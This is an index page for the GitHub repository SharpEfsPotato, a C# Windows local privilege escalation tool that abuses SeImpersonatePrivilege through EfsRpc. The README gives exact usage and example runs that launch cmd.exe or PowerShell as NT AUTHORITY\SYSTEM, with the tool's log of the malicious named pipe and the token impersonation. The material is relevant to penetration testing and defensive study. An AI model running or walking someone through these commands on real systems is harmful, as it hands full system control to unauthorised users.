Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/bugch3ck/SharpEfsPotato
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
- Host: GitHub
- URL: https://github.com/bugch3ck/SharpEfsPotato
- Owner: bugch3ck
- Created: 2022-10-17T12:20:47.000Z (about 2 years ago)
- Default Branch: master
- Last Pushed: 2022-10-17T12:35:06.000Z (about 2 years ago)
- Last Synced: 2024-08-05T17:25:57.991Z (4 months ago)
- Language: C#
- Size: 31.3 KB
- Stars: 294
- Watchers: 5
- Forks: 43
- Open Issues: 0
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - bugch3ck/SharpEfsPotato - Local privilege escalation from SeImpersonatePrivilege using EfsRpc. (C#)
README
# SharpEfsPotato
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
## Usage
```
C:\temp>SharpEfsPotato.exe -h
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
-p, --prog=VALUE Program to launch (default cmd.exe)
-a, --args=VALUE Arguments for program (default null)
-h, --help Display this help
```
## Examples
### Default behavior: Start cmd.exe as system in a separate process (in separate console)
```
C:\temp>SharpEfsPotato.exe
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f/\44259a4a-cbea-499b-9dc5-a9b1c13a4b9f\44259a4a-cbea-499b-9dc5-a9b1c13a4b9f
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
```
### Specify PowerShell binary and arguments
```
C:\temp>SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\temp>type C:\temp\w.log
nt authority\system
```